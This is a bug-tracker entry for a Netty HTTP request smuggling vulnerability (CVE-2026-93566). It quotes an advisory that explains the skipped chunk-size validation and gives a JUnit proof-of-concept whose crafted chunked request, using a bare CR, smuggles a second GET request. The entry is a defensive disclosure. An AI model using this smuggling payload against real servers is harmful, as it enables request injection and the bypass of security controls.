Bug 2536954 (CVE-2026-93566) - CVE-2026-93566 io.netty/netty-codec-http: Netty: HTTP Request Smuggling due to control characters in the chunk-size line
Summary: CVE-2026-93566 io.netty/netty-codec-http: Netty: HTTP Request Smuggling due t...
Keywords:
Status: NEW
Alias: CVE-2026-93566
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Product Security
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2026-09-18 10:02 UTC by OSIDB Bzimport
Modified: 2026-09-18 20:01 UTC (History)
66 users (show)

Fixed In Version:
Clone Of:
Environment:
Last Closed:
Embargoed:


Attachments (Terms of Use)

Description OSIDB Bzimport 2026-09-18 10:02:32 UTC
HTTP Request Smuggling due to control characters in the chunk-size line

A public GitHub Security Advisory (GHSA-rq4j-fc47-9698) describes the following issue:

### Summary
Netty skips strict chunk size line validation when the line has no chunk extension (`;`), so a chunk size line containing an embedded bare CR (e.g. `0\rX`) is accepted instead of rejected, enabling HTTP request smuggling.

### Details
`io.netty.handler.codec.http.HttpObjectDecoder#checkChunkExtensions` only runs the strict validator `HttpChunkLineValidatingByteProcessor` when a `;` is present:

```java
        int extensionsStart = line.bytesBefore((byte) ';');
        if (extensionsStart == -1) {
            return;
        }
```

According to RFC 9112 https://datatracker.ietf.org/doc/html/rfc9112#appendix-A

`chunk-size = 1*HEXDIG`

### PoC

```java
@Test
public void test() {
    String requestStr = "POST / HTTP/1.1\r\n" +
            "Host: localhost\r\n" +
            "Transfer-Encoding: chunked\r\n\r\n" +
            "0\rX\r\n" +
            "\r\n" +
            "GET /smuggled HTTP/1.1\r\n" +
            "Host: localhost\r\n" +
            "Content-Length: 0\r\n" +
            "\r\n";

    EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());
    assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII)));

    // Request 1
    HttpRequest request = channel.readInbound();
    assertTrue(request.decoderResult().isSuccess());
    LastHttpContent last = channel.readInbound();
    assertTrue(last.decoderResult().isSuccess());
    last.release();

    // Request 2 (smuggled)
    request = channel.readInbound();
    assertTrue(request.decoderResult().isSuccess());
    assertEquals("/smuggled", request.uri());
    last = channel.readInbound();
    assertTrue(last.decoderResult().isSuccess());
    last.release();
}
```

### Impact
HTTP Request Smuggling: Attacker injects arbitrary HTTP requests

Affected:
- maven:io.netty:netty-codec-http affected >=4.2.0.Final, <=4.2.17.Final; fixed unknown
- maven:io.netty:netty-codec-http affected <=4.1.137.Final; fixed unknown

Fixed versions: see advisory

Advisory: https://github.com/netty/netty/security/advisories/GHSA-rq4j-fc47-9698


Note You need to log in before you can comment on or make changes to this bug.